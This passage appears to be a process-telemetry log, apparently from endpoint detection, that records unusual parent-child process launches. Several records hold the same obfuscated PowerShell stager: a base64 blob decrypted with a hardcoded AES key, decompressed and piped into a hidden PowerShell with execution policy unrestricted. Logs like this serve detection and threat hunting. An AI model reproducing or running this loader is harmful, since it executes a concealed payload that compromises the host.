'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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - |
cmdline | powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - } |
parent_process | powershell.exe | martian_process | C:\Windows\System32\cmd.exe /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = 